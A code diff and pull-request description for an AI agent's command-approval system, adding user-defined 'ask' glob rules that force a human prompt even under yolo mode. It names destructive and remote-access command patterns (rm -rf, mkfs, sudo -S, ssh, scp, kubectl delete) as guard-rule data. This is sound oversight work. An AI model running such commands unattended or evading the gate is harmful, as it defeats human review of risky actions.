@@ -4718,6 +4866,19 @@ def check_all_command_guards(command: str, env_type: str,
     if is_dangerous:
         if not is_approved(session_key, pattern_key):
             warnings.append((pattern_key, description, False))
+
+    # Additive ask finding (see the pre-yolo block above): when this command
+    # reached the findings phase despite an ask match, surface the ask rule
+    # as its own warning line. A cached ask grant suppresses exactly this
+    # entry; it never suppresses the tirith/dangerous entries above.
+    if ask_pattern is not None and not is_approved(
+            session_key, f"ask_rule:{ask_pattern}"):
+        warnings.append((
+            f"ask_rule:{ask_pattern}",
+            f"user-defined ask rule '{ask_pattern}' (approvals.ask in "
+            "config.yaml) requires your approval",
+            False,
+        ))
 
     # Nothing to warn about
     if not warnings:

--- a/website/docs/user-guide/security.md
+++ b/website/docs/user-guide/security.md
@@ -139,6 +139,26 @@ Like the rest of the approval config, changes take effect immediately (the confi
 Deny rules are a guardrail against an honest-but-wrong agent, the same threat model as the dangerous-pattern detector. They are not a sandbox against a deliberately adversarial process — for that, use an isolated backend (Docker, Modal) or an egress-restricted environment.
 :::
 
+### User-Defined Ask Rules (`approvals.ask`)
+
+`approvals.ask` completes the Claude Code-style trio: `deny` blocks, `command_allowlist` auto-approves, and **`ask` prompts**. An ask rule raises the interactive approval prompt for matching commands — also **before** `--yolo`, `/yolo`, and `approvals.mode: off` — so a command surfaces even while approvals are otherwise bypassed. Use it for yolo-with-checkpoints: "let the agent do everything, but always show me these first."
+
+```yaml
+approvals:
+  mode: off          # everything else runs without prompts
+  ask:
+    - "ssh *"
+    - "scp *"
+    - "kubectl delete *"
+```
+
+Details:
+
+- Matching semantics are identical to deny rules (fnmatch globs, case-insensitive, run over the normalized/deobfuscated command variants; quote patterns in YAML).
+- The prompt is the same gate dangerous commands use: `[o]nce / [s]ession / [a]lways / [d]eny`. Answering **always** persists that specific rule in the permanent allowlist, so a command you trust stops asking.
+- Ordering within one command: hardline blocklist → sudo stdin guard → `deny` → `ask` → allowlist/dangerous detection. A command matching both `deny` and `ask` is denied — deny always wins.
+- In contexts with no human reachable (cron jobs, single-query `-q`, bare scripts), an ask match **fails closed**: the command is blocked with an explanation instead of running unattended. If the command is safe unattended, remove it from the ask list rather than relying on a timeout.
+
 ### Approval Timeout
 
 When a dangerous command prompt appears, the user has a configurable amount of time to respond. If no response is given within the timeout, the command is **denied** by default (fail-closed).


### PR DESCRIPTION
Closes #0 (feature request from live use — happy to re-link if an issue exists)

## Problem

Hermes has only two user-editable approval tiers:

- `approvals.deny` - hard block, fires before yolo/mode=off
- `command_allowlist` - auto-approve

The **prompt** tier is hardcoded to the built-in dangerous-pattern list in `tools/approval.py` (`rm -rf`, `mkfs`, `sudo -S`, ...) and cannot be extended from config. An operator running `approvals.mode: off` or yolo therefore has no way to nominate specific commands that must still surface a human decision. Concrete example from live use: *"run everything unattended, but every ssh/scp should ask me first"* is currently impossible - ssh matches no dangerous pattern, so it runs silently.

Claude Code solves this with three lists: allow / ask / deny. Hermes has two of the three.

## Change

Adds `approvals.ask` - fnmatch globs with identical matching semantics to `deny` (same normalized/deobfuscated command variants, case-insensitive), evaluated in **both** guard entry points (`check_dangerous_command`, `check_all_command_guards`) after deny and **before** the yolo/`mode=off` bypass:

```
hardline -> sudo-stdin guard -> deny -> ASK -> yolo/off bypass -> allowlist -> dangerous-pattern prompt
```

- A match routes through the shared `_run_approval_gate` with a new `honor_yolo_bypass=False` flag, so the prompt fires exactly when everything else is bypassed. Existing callers are unchanged (flag defaults to True).
- Persistence rides the existing gate: `[o]nce / [s]ession / [a]lways / [d]eny` under a per-rule `ask_rule:<glob>` key - answering "always" on `ssh *` never whitelists `kubectl delete *`.
- No-human contexts (cron, single-query `-q`, bare scripts) **fail closed** via `fail_closed_when_no_human=True`: an ask rule explicitly demands a human, so unattended runs get a BLOCKED explanation instead of silent execution.
- Deny wins when a command matches both lists (deny is checked first).
- `hermes approvals test` gains the tier at step 4.5 and reports ask matches as `ask-approval` (exit 2) even under `mode: off`.
- Config default + commented example added to `config_defaults.py`; docs section added to `website/docs/user-guide/security.md`.

## Example

```yaml
approvals:
  mode: off        # everything else runs without prompts
  ask:
    - "ssh *"
    - "scp *"
```

## Tests

- New `tests/tools/test_approval_ask_rules.py` (10 tests): matcher semantics (empty/missing/corrupt config fail open), glob matching, quote-obfuscation parity with deny, ask beats `_YOLO_MODE_FROZEN` and `mode: off`, non-matching commands still allowed under off, deny-wins ordering, fail-closed no-human.
- New CLI test in `tests/hermes_cli/test_approvals_test.py`: tester reports ask verdict (exit 2) under mode=off.
- Full local run of every approval-touching suite: `test_approval*.py` (102+13+7+10 + windows/hook/config suites), `test_command_guards`, `test_cron_approval_mode` (30), `test_execute_code_approval_cluster` (22), `test_approval_plugin_hooks` (21), `test_execution_flag_detection` (85), cli approvals suites (45) - all green; pre-existing parity/deny suites untouched and passing.

## Notes for reviewers

- The `honor_yolo_bypass` parameter is the only signature change to `_run_approval_gate`; both existing call sites keep default behavior.
- Ask rules intentionally do NOT apply to execute_code (arbitrary Python) - that surface already gates whole-script approval separately and pattern-matching Python source would be false-positive soup. Happy to add a dedicated `approvals.ask_tools` mapping if reviewers want tool-level asks too.
